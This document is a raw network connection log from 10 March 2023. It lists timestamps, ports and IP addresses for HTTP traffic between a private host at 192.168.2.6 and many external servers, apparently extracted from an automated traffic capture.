                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.051449060 CET4980380192.168.2.6170.82.174.30
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.361929893 CET4981180192.168.2.6211.1.226.67
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.438574076 CET4980380192.168.2.6170.82.174.30
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.514281988 CET4981280192.168.2.662.122.190.121
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.550509930 CET804981262.122.190.121192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.550630093 CET4981280192.168.2.662.122.190.121
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.556091070 CET4981280192.168.2.662.122.190.121
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.592250109 CET804981262.122.190.121192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.594182968 CET804981262.122.190.121192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.594278097 CET4981280192.168.2.662.122.190.121
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.648685932 CET8049803170.82.174.30192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.651016951 CET8049811211.1.226.67192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.651124001 CET4981180192.168.2.6211.1.226.67
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.651530027 CET4981180192.168.2.6211.1.226.67
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.688220024 CET4981380192.168.2.6192.241.158.94
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.688432932 CET4981480192.168.2.6172.67.152.159
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.689064026 CET4981580192.168.2.6104.26.14.53
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.689114094 CET4981680192.168.2.63.140.13.188
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.689554930 CET4981780192.168.2.6206.191.152.37
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.689919949 CET4981880192.168.2.699.83.154.118
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.706335068 CET8049814172.67.152.159192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.706554890 CET4981480192.168.2.6172.67.152.159
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.706732035 CET8049815104.26.14.53192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.706901073 CET4981580192.168.2.6104.26.14.53
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.708985090 CET804981899.83.154.118192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.709090948 CET4981880192.168.2.699.83.154.118
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.740746021 CET4981580192.168.2.6104.26.14.53
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.740820885 CET4981880192.168.2.699.83.154.118
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.741386890 CET4981480192.168.2.6172.67.152.159
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.758467913 CET8049815104.26.14.53192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.758738995 CET8049814172.67.152.159192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.760720968 CET804981899.83.154.118192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.761419058 CET804981899.83.154.118192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.761631012 CET4981880192.168.2.699.83.154.118
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.768842936 CET8049815104.26.14.53192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.768877983 CET8049815104.26.14.53192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.768899918 CET8049815104.26.14.53192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.768924952 CET8049815104.26.14.53192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.768943071 CET8049815104.26.14.53192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.768961906 CET8049815104.26.14.53192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.768976927 CET8049815104.26.14.53192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.768992901 CET8049815104.26.14.53192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.769022942 CET4981580192.168.2.6104.26.14.53
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.769095898 CET4981580192.168.2.6104.26.14.53
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.769324064 CET8049815104.26.14.53192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.769382954 CET4981580192.168.2.6104.26.14.53
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.781316996 CET4981280192.168.2.662.122.190.121
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.786854029 CET8049813192.241.158.94192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.786964893 CET4981380192.168.2.6192.241.158.94
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.795653105 CET8049803170.82.174.30192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.795818090 CET4980380192.168.2.6170.82.174.30
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.818295002 CET804981262.122.190.121192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.818394899 CET4981280192.168.2.662.122.190.121
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.825315952 CET8049814172.67.152.159192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.825345993 CET8049814172.67.152.159192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.825361967 CET8049814172.67.152.159192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.825411081 CET4981480192.168.2.6172.67.152.159
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.825453997 CET4981480192.168.2.6172.67.152.159
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.844508886 CET80498163.140.13.188192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.844634056 CET4981680192.168.2.63.140.13.188
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.872296095 CET4981580192.168.2.6104.26.14.53
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.889446974 CET8049815104.26.14.53192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.896522999 CET4981380192.168.2.6192.241.158.94
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.941956043 CET8049811211.1.226.67192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.942545891 CET8049811211.1.226.67192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.942641020 CET4981180192.168.2.6211.1.226.67
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.956240892 CET8049817206.191.152.37192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.956365108 CET4981780192.168.2.6206.191.152.37
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.978980064 CET4981680192.168.2.63.140.13.188
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.994571924 CET8049813192.241.158.94192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.994615078 CET8049813192.241.158.94192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.994790077 CET4981380192.168.2.6192.241.158.94
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.064749002 CET804976039.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.064865112 CET4976080192.168.2.639.99.233.155
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.104326010 CET4981180192.168.2.6211.1.226.67
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.134283066 CET80498163.140.13.188192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.134313107 CET80498163.140.13.188192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.134448051 CET4981680192.168.2.63.140.13.188
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.156675100 CET4981780192.168.2.6206.191.152.37
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.157701015 CET4981680192.168.2.63.140.13.188
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.180010080 CET4981380192.168.2.6192.241.158.94
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.269902945 CET4981980192.168.2.63.140.13.188
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.278073072 CET8049813192.241.158.94192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.278146982 CET4981380192.168.2.6192.241.158.94
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.313853025 CET80498163.140.13.188192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.340837955 CET4982080192.168.2.689.161.163.246
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.341913939 CET4982180192.168.2.6192.124.249.10
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.361141920 CET8049821192.124.249.10192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.361224890 CET4982180192.168.2.6192.124.249.10
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.363523006 CET4982180192.168.2.6192.124.249.10
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.373467922 CET804982089.161.163.246192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.373564959 CET4982080192.168.2.689.161.163.246
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.374851942 CET4982080192.168.2.689.161.163.246
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.383681059 CET8049821192.124.249.10192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.384042978 CET8049821192.124.249.10192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.384123087 CET4982180192.168.2.6192.124.249.10
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.396187067 CET8049811211.1.226.67192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.396321058 CET4981180192.168.2.6211.1.226.67
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.408525944 CET804982089.161.163.246192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.408973932 CET804982089.161.163.246192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.409058094 CET4982080192.168.2.689.161.163.246
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.409105062 CET804982089.161.163.246192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.409157991 CET4982080192.168.2.689.161.163.246
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.409658909 CET4982280192.168.2.682.201.61.230
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.423808098 CET8049817206.191.152.37192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.424027920 CET8049817206.191.152.37192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.424057961 CET8049817206.191.152.37192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.424081087 CET8049817206.191.152.37192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.424161911 CET4981780192.168.2.6206.191.152.37
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.424216032 CET4981780192.168.2.6206.191.152.37
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.425607920 CET80498193.140.13.188192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.425785065 CET4981980192.168.2.63.140.13.188
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.429373980 CET4981780192.168.2.6206.191.152.37
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.439917088 CET804982282.201.61.230192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.440093040 CET4982280192.168.2.682.201.61.230
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.571402073 CET4981980192.168.2.63.140.13.188
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.571438074 CET4982280192.168.2.682.201.61.230
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.572375059 CET4982180192.168.2.6192.124.249.10
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.591662884 CET8049821192.124.249.10192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.592159033 CET4982180192.168.2.6192.124.249.10
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.601793051 CET804982282.201.61.230192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.602705002 CET804982282.201.61.230192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.602823019 CET4982280192.168.2.682.201.61.230
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.664267063 CET4982380192.168.2.680.74.154.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.690323114 CET804982380.74.154.6192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.690553904 CET4982380192.168.2.680.74.154.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.696131945 CET8049817206.191.152.37192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.725975990 CET80498193.140.13.188192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.726006985 CET80498193.140.13.188192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.726166964 CET4981980192.168.2.63.140.13.188
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.795439005 CET4981980192.168.2.63.140.13.188
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.800065041 CET4982480192.168.2.634.117.168.233
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.800214052 CET4982580192.168.2.6192.252.154.18
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.816780090 CET804982434.117.168.233192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.816930056 CET4982480192.168.2.634.117.168.233
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.840599060 CET4979580192.168.2.6137.118.26.67
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.892731905 CET4982280192.168.2.682.201.61.230
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.893048048 CET4982380192.168.2.680.74.154.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.898370028 CET8049825192.252.154.18192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.898464918 CET4982580192.168.2.6192.252.154.18
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.899837971 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.916531086 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.916630983 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.917033911 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.918888092 CET804982380.74.154.6192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.918924093 CET804982380.74.154.6192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.919012070 CET4982380192.168.2.680.74.154.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.924029112 CET804982282.201.61.230192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.924185038 CET4982280192.168.2.682.201.61.230
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.933599949 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.943728924 CET4982480192.168.2.634.117.168.233
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.950129032 CET80498193.140.13.188192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.960481882 CET804982434.117.168.233192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.965981007 CET804982434.117.168.233192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.966101885 CET4982480192.168.2.634.117.168.233
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.973084927 CET4982580192.168.2.6192.252.154.18
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.025810957 CET4982380192.168.2.680.74.154.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.051851034 CET804982380.74.154.6192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.051969051 CET4982380192.168.2.680.74.154.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.071429014 CET8049825192.252.154.18192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.073185921 CET8049825192.252.154.18192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.073281050 CET4982580192.168.2.6192.252.154.18
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.207667112 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.207729101 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.207756996 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.207761049 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.207784891 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.207803011 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.207803965 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.207835913 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.207858086 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.207890987 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.207894087 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.207927942 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.207941055 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.207957029 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.207988024 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.207989931 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.208009958 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.208019972 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.208033085 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.208053112 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.208080053 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.208112955 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.208113909 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.208159924 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.220263004 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.220336914 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.220511913 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.220544100 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.220580101 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.220602036 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.220608950 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.220629930 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.220637083 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.220654011 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.220664978 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.220700979 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.221193075 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.221241951 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.221270084 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.221271992 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.221322060 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.221981049 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.222019911 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.222048044 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.222075939 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.222084045 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.222103119 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.222131968 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.222163916 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.224661112 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.224705935 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.224733114 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.224756956 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.224781990 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.225024939 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.227049112 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.227077007 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.227289915 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.227305889 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.227310896 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.227329969 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.227333069 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.227368116 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.227396011 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.235235929 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.235266924 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.235285997 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.235304117 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.235323906 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.235336065 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.235388041 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.235447884 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.235491037 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.235507011 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.235548019 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.235575914 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.235610008 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.235619068 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.235630035 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.235650063 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.235677958 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.236098051 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.236118078 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.236135960 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.236151934 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.236154079 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.236182928 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.236226082 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.237395048 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.237454891 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.237464905 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.237473965 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.237493038 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.237505913 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.237524033 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.237531900 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.237580061 CET4982680192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.238035917 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.238056898 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.238075018 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.238094091 CET8049826172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.238096952 CET4982680192.168.2.6172.67.70.223
